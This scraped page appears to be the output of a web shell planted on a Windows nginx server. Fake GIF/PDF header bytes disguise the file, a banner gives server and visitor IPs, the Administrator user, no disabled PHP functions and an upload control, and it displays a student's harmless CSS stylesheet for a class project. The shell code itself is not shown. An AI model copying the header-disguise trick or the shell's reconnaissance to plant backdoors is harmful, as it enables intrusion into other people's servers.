GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Examples/wherehome/ |
Upload File : |
/* Philip Watland Style sheet TCK project*/ a:link { color: blue; } a:active { color: grey; } a:hover { color: green; } body { background-color: #FFF; /*background image and trying to have it transpartent about 50%. */ } #background { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-image: url(flags%20of%20world2.png); background-repeat: no-repeat; background-attachment: fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; opacity: 0.20; filter: alpha(opacity=30); z-index: -1; /* Jim Helped with this */ } /*for banner copied from w3 schools start*/ ul { list-style-type: none; margin: 0; padding: 0; overflow: hidden; background-color: gray; } li { float: left; } li a { display: block; color: white; text-align: center; padding: 19px 80px; text-decoration: none; } /*end for banner*/ #imagem { position: absolute; left: 550px; } #imagew { position: relative; left: 474px; top: 0px; } #textm { position: absolute; top: 600px; font-size: 20px } #textw { position: absolute; top: 600px; font-size: 20px } #textbe { position: absolute; top: 600px; font-size: 20px } #textre { position: absolute; top: 600px; font-size: 20px } #textgre { position: absolute; top:600px; font-size: 20px } #texttra { position: absolute; top:600px; font-size: 20px } /*code copy from https://blog.synq.fm/how-to-embed-a-responsive-online-video-player-with-css-and-html start */ .video-container { position: relative; /*padding-bottom: 56.25%;*/ padding-top: 0px; height: 360px; overflow: hidden; } .video-container iframe, .video-container object, .video-container embed { position: absolute; top: 0; left: 750px; /*width: 50%; height: 50%;*/ } /*code copy from https://blog.synq.fm/how-to-embed-a-responsive-online-video-player-with-css-and-html end */